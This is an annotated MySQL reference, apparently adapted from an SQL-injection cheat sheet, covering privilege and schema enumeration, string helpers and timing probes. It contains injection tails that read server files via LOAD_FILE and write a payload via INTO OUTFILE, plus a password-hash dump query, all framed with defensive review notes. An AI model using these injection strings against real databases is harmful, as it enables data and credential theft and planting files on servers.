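-- MySQL comment syntax. "#" and "-- " run to the end of the line (the two
-- dashes must be followed by whitespace); /* ... */ can sit inside a statement.
SELECT 1; #comment
SELECT /*comment*/1;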
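-- Identity of the current session, as user@host.
SELECT user();
SELECT system_user();

-- Every account name on the server. Reading mysql.user requires privileges
-- on the mysql system schema.
SELECT user FROM mysql.user; -- priv

-- Account lifecycle. <name> and <pass> are placeholders.
CREATE USER <name> IDENTIFIED BY '<pass>';
DROP USER <name>;

-- NOTE(review): ALL PRIVILEGES ON *.* with host '%' gives the account every
-- global privilege from any client address. Audit for grants of this shape;
-- service accounts should be scoped to the schemas and hosts they need.
GRANT ALL PRIVILEGES ON *.* TO <name>@'%';

-- Accounts holding the SUPER privilege, from the standard view and from the
-- grant table itself.
SELECT
    grantee,
    privilege_type,
    is_grantable
FROM information_schema.user_privileges
WHERE privilege_type = 'SUPER';

SELECT
    host,
    user
FROM mysql.user
WHERE Super_priv = 'Y';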
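-- Global (server-wide) privileges per grantee.
SELECT
    grantee,
    privilege_type,
    is_grantable
FROM information_schema.user_privileges;

-- The same information read from the grant table: one Y/N flag column per
-- privilege. Requires read access to the mysql system schema.
SELECT
    host,
    user,
    Select_priv,
    Insert_priv,
    Update_priv,
    Delete_priv,
    Create_priv,
    Drop_priv,
    Reload_priv,
    Shutdown_priv,
    Process_priv,
    File_priv,
    Grant_priv,
    References_priv,
    Index_priv,
    Alter_priv,
    Show_db_priv,
    Super_priv,
    Create_tmp_table_priv,
    Lock_tables_priv,
    Execute_priv,
    Repl_slave_priv,
    Repl_client_priv
FROM mysql.user;

-- Privileges granted at schema (database) level.
SELECT
    grantee,
    table_schema,
    privilege_type
FROM information_schema.schema_privileges;

-- Privileges granted on individual columns.
SELECT
    table_schema,
    table_name,
    column_name,
    privilege_type
FROM information_schema.column_privileges;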
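-- Default schema of the current session.
SELECT database();

-- All schemas visible to the current account.
SELECT schema_name FROM information_schema.schemata; -- for MySQL >= v5.0

-- Schemas that have database-level grants recorded in mysql.db.
SELECT DISTINCT db FROM mysql.db;

-- Filesystem location of the server's data directory.
SELECT @@datadir;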
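-- Tables outside the two system schemas.
SELECT
    table_schema,
    table_name
FROM information_schema.tables
WHERE table_schema NOT IN ('mysql', 'information_schema');

-- Columns outside the two system schemas.
SELECT
    table_schema,
    table_name,
    column_name
FROM information_schema.columns
WHERE table_schema NOT IN ('mysql', 'information_schema');

-- Tables that contain a column with a given name. The source listing had an
-- empty pair of typographic quotes here; <column name> is a placeholder.
SELECT
    table_schema,
    table_name
FROM information_schema.columns
WHERE column_name = '<column name>';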
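-- Select the <nth> row of a result set.
-- NOTE(review): ROWNUM and all_users are Oracle constructs, so this statement
-- does not run on MySQL even though the rest of the listing is MySQL. MySQL
-- selects a single row by position with ORDER BY ... LIMIT ... OFFSET.
SELECT username
FROM (
    SELECT
        ROWNUM r,
        username
    FROM all_users
    ORDER BY username
)
WHERE r=<nth>;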
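-- String and character helpers.
-- SUBSTR's third argument is a length, not an end position; positions are
-- 1-based.
SELECT substr('<string>', <start>, <length>); # returns <length> characters from position <start>
SELECT char(65); # returns A
SELECT ascii('A'); # returns 65
-- Hex literal: the prefix is the letter "x" (the source listing had the
-- multiplication sign U+00D7, which is not valid SQL).
SELECT 0x414243; # returns ABC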
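-- Casting
SELECT cast('1' AS unsigned integer);
SELECT cast('123' AS char);

-- String concatenation
SELECT CONCAT('A','B','C');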
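-- Conditional expressions: MySQL's IF() function and the standard CASE form.
SELECT if(1=1,'foo','bar'); # returns foo
SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A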
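-- Time delays. BENCHMARK(count, expr) evaluates expr count times and
-- returns 0; SLEEP(n) pauses the statement for n seconds.
-- Neither has much reason to appear in application traffic, so statements
-- containing them in query logs are a useful detection signal for time-based
-- SQL injection probing.
SELECT BENCHMARK(1000000,MD5('A'));
SELECT SLEEP(<seconds>); # >= 5.0.12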
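-- Account password hashes; requires read access to mysql.user, which should
-- be limited to administrative accounts.
-- NOTE(review): the password column was removed from mysql.user in MySQL 5.7
-- (hashes are kept in authentication_string), so this form applies to older
-- servers; confirm against the server version in use.
-- The trailing comment needs whitespace after the dashes to parse as a comment.
SELECT
    host,
    user,
    password
FROM mysql.user; -- priv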
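-- File access through the database server. Both directions require the FILE
-- privilege and are confined by the secure_file_priv system variable.
-- Application accounts should not hold FILE, and secure_file_priv should be
-- set to a dedicated directory or disabled (NULL).

-- Read: an injection tail, not a full statement. The leading quote closes a
-- string in the host query, and the appended SELECT returns the file's
-- contents as a row.
…' UNION ALL SELECT LOAD_FILE('<readable file>'); #SQLi

-- Write: export query output to a file on the database host.
-- NOTE(review): MySQL expects a keyword (OUTFILE or DUMPFILE) between INTO
-- and the quoted path; <name> appears to stand in for it here.
SELECT * FROM mytable INTO <name> '<path to name>';

-- Write, as an injection tail: the trailing "-- -'" comments out the rest of
-- the host query. Left as found, including the space inside the path quotes.
UNION SELECT ("<payload>") INTO OUTFILE '<path> ' -- -'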